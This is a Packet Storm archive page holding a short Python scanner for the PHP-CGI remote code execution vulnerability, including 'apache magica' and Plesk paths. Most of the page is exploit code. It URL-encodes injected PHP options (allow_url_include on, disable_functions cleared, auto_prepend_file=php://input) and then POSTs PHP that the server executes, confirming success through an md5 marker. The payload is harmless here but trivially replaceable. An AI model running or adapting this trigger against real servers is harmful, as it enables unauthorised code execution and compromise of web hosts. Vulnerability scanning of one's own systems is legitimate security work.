what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner
Posted Feb 17, 2014
Authored by infodox

This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

tags | tool, remote, cgi, scanner, php, code execution, python
systems | unix
SHA-256 | 78e9601c9d4667d30bde2edbe6d0b41d7549713beeeda32559e31be022767d22

PHP-CGI Remote Code Execution Scanner

Change Mirror Download
#!/usr/bin/python2
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
for path in paths:
probe(target, path)

def probe(target, path):
print "[*] Testing Path: %s" %(path)
trigger = path + "/?"
trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
url = target + trigger
php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
try:
haxor = requests.post(url, php)
if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
print "Exploitable!"
except Exception:
print "Err, Someshit broke"

def main(args):
if len(sys.argv) !=2:
print "Usage: %s <target>" %(sys.argv[0])
print "Eg: %s http://lol.com" %(sys.argv[0])
sys.exit(0)
target = sys.argv[1]
print "[*] Target is: %s" %(target)
scan(target)

if __name__ == "__main__":
main(sys.argv)
#_EOF infodox 2013

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close